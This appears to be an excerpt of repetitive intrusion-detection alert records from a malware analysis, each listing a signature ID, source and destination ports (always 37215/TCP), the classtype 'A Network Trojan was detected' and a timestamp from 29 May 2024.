                SID:2835222
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908311
                SID:2829579
                Source Port:49076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042383
                SID:2835222
                Source Port:43998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845341
                SID:2829579
                Source Port:56964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870319
                SID:2835222
                Source Port:57320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832878
                SID:2829579
                Source Port:34416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765280
                SID:2835222
                Source Port:58364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764261
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958599
                SID:2829579
                Source Port:53282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854509
                SID:2829579
                Source Port:54136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821248
                SID:2835222
                Source Port:59376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966798
                SID:2829579
                Source Port:33586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524467
                SID:2835222
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975185
                SID:2835222
                Source Port:36762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643242
                SID:2829579
                Source Port:34406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779600
                SID:2829579
                Source Port:44080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780636
                SID:2835222
                Source Port:36858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663943
                SID:2835222
                Source Port:60986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885829
                SID:2829579
                Source Port:37864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177238
                SID:2835222
                Source Port:55310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568909
                SID:2829579
                Source Port:35036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433017
                SID:2835222
                Source Port:35814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612430
                SID:2835222
                Source Port:46692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702174
                SID:2835222
                Source Port:56504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734739
                SID:2829579
                Source Port:42254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612962
                SID:2835222
                Source Port:36904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928180
                SID:2835222
                Source Port:33790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722421
                SID:2829579
                Source Port:58700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946353
                SID:2829579
                Source Port:42414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767725
                SID:2829579
                Source Port:56386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948606
                SID:2835222
                Source Port:60298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655022
                SID:2835222
                Source Port:54974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073928
                SID:2835222
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881849
                SID:2829579
                Source Port:46920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626921
                SID:2829579
                Source Port:42806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859442
                SID:2835222
                Source Port:56942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610091
                SID:2835222
                Source Port:43686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270305
                SID:2835222
                Source Port:37670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928805
                SID:2835222
                Source Port:38818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639597
                SID:2835222
                Source Port:48214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073831
                SID:2835222
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023423
                SID:2835222
                Source Port:49172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835987
                SID:2835222
                Source Port:39032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560842
                SID:2829579
                Source Port:59252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899633
                SID:2829579
                Source Port:36544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950292
                SID:2835222
                Source Port:56886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322270
                SID:2835222
                Source Port:53152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896091
                SID:2835222
                Source Port:37284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066790
                SID:2835222
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910279
                SID:2835222
                Source Port:56936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908016
                SID:2835222
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.921011
                SID:2829579
                Source Port:32972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263868
                SID:2829579
                Source Port:43820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949623
                SID:2835222
                Source Port:53658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925870
                SID:2829579
                Source Port:59610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215377
                SID:2829579
                Source Port:57200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626453
                SID:2835222
                Source Port:36810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210030
                SID:2835222
                Source Port:55472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364262
                SID:2835222
                Source Port:52646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075761
                SID:2835222
                Source Port:58850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956146
                SID:2835222
                Source Port:39622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711347
                SID:2835222
                Source Port:60482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665317
                SID:2835222
                Source Port:44360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473562
                SID:2829579
                Source Port:55512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.606742
                SID:2835222
                Source Port:57710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.046244
                SID:2835222
                Source Port:53894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558642
                SID:2829579
                Source Port:48806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804783
                SID:2829579
                Source Port:59706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919879
                SID:2835222
                Source Port:47068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789393
                SID:2835222
                Source Port:54846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332787
                SID:2829579
                Source Port:59490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994633
                SID:2829579
                Source Port:48896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091264
                SID:2835222
                Source Port:50164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810908
                SID:2835222
                Source Port:54480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397127
                SID:2835222
                Source Port:44624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511444
                SID:2829579
                Source Port:34374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689117
                SID:2829579
                Source Port:51092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848754
                SID:2835222
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023330
                SID:2835222
                Source Port:32820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965443
                SID:2835222
                Source Port:35632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655659
                SID:2835222
                Source Port:55406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900113
                SID:2835222
                Source Port:49618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571288
                SID:2835222
                Source Port:57762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788564
                SID:2829579
                Source Port:42276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962057
                SID:2835222
                Source Port:52620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267719
                SID:2829579
                Source Port:58356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385182
                SID:2829579
                Source Port:34496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417212
                SID:2835222
                Source Port:50050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436305
                SID:2835222
                Source Port:41064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.605743
                SID:2829579
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938874
                SID:2835222
                Source Port:48606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181471
                SID:2829579
                Source Port:58980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532206
                SID:2829579
                Source Port:33716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783023
                SID:2835222
                Source Port:43982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845573
                SID:2835222
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369837
                SID:2835222
                Source Port:60962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576044
                SID:2829579
                Source Port:37086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910370
                SID:2835222
                Source Port:46602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329362
                SID:2829579
                Source Port:57808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088136
                SID:2835222
                Source Port:42542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.043269
                SID:2829579
                Source Port:50106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111628
                SID:2835222
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232102
                SID:2829579
                Source Port:52610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511144
                SID:2829579
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518887
                SID:2829579
                Source Port:51066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281652
                SID:2835222
                Source Port:46330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319566
                SID:2835222
                Source Port:55346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135523
                SID:2835222
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868269
                SID:2829579
                Source Port:36040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321173
                SID:2829579
                Source Port:49460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930508
                SID:2835222
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166205
                SID:2835222
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551290
                SID:2829579
                Source Port:54834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518045
                SID:2835222
                Source Port:37606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902384
                SID:2835222
                Source Port:47894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684774
                SID:2835222
                Source Port:56630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.726546
                SID:2835222
                Source Port:47556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257018
                SID:2829579
                Source Port:59852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773052
                SID:2829579
                Source Port:58984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276513
                SID:2829579
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184917
                SID:2835222
                Source Port:37996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764279
                SID:2835222
                Source Port:34178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858223
                SID:2829579
                Source Port:33544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444760
                SID:2829579
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521280
                SID:2835222
                Source Port:50644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860492
                SID:2835222
                Source Port:52646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394825
                SID:2835222
                Source Port:36732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855655
                SID:2835222
                Source Port:52212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154365
                SID:2829579
                Source Port:52060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865969
                SID:2835222
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520380
                SID:2829579
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586983
                SID:2835222
                Source Port:46692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180520
                SID:2829579
                Source Port:34736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287606
                SID:2829579
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027907
                SID:2835222
                Source Port:51300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075396
                SID:2829579
                Source Port:53994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375180
                SID:2829579
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474766
                SID:2829579
                Source Port:60102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025267
                SID:2835222
                Source Port:41060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286707
                SID:2835222
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666991
                SID:2835222
                Source Port:39644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717217
                SID:2835222
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766342
                SID:2835222
                Source Port:39754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870035
                SID:2835222
                Source Port:43330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436568
                SID:2835222
                Source Port:38724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462360
                SID:2835222
                Source Port:33234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545569
                SID:2835222
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706118
                SID:2829579
                Source Port:37024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333717
                SID:2835222
                Source Port:39396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903007
                SID:2835222
                Source Port:48386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522716
                SID:2835222
                Source Port:34872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559081
                SID:2829579
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325621
                SID:2829579
                Source Port:56104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317289
                SID:2835222
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263791
                SID:2835222
                Source Port:43396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023395
                SID:2829579
                Source Port:56898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945220
                SID:2829579
                Source Port:44384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239405
                SID:2835222
                Source Port:55890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849060
                SID:2835222
                Source Port:43506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088666
                SID:2829579
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983725
                SID:2835222
                Source Port:55974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626376
                SID:2829579
                Source Port:51150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.664196
                SID:2835222
                Source Port:38100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336625
                SID:2829579
                Source Port:48090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628105
                SID:2835222
                Source Port:51564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461797
                SID:2829579
                Source Port:47478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070329
                SID:2835222
                Source Port:59340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988583
                SID:2829579
                Source Port:49406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804037
                SID:2829579
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983230
                SID:2835222
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942877
                SID:2835222
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572323
                SID:2829579
                Source Port:49784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983979
                SID:2835222
                Source Port:50156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161300
                SID:2829579
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735810
                SID:2835222
                Source Port:60212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567126
                SID:2835222
                Source Port:40824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810154
                SID:2829579
                Source Port:46318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322945
                SID:2829579
                Source Port:41656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972696
                SID:2835222
                Source Port:44768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015029
                SID:2829579
                Source Port:44942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284332
                SID:2835222
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.664237
                SID:2829579
                Source Port:36192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883165
                SID:2829579
                Source Port:44078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586919
                SID:2835222
                Source Port:57172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292816
                SID:2829579
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899736
                SID:2829579
                Source Port:55620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381720
                SID:2829579
                Source Port:49198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112989
                SID:2829579
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945723
                SID:2829579
                Source Port:60262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687071
                SID:2835222
                Source Port:49152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859939
                SID:2835222
                Source Port:60722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.905923
                SID:2829579
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.391699
                SID:2835222
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555413
                SID:2829579
                Source Port:49582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854211
                SID:2829579
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945186
                SID:2835222
                Source Port:55140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274295
                SID:2829579
                Source Port:53940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361632
                SID:2829579
                Source Port:34002
                Destination Port:37215
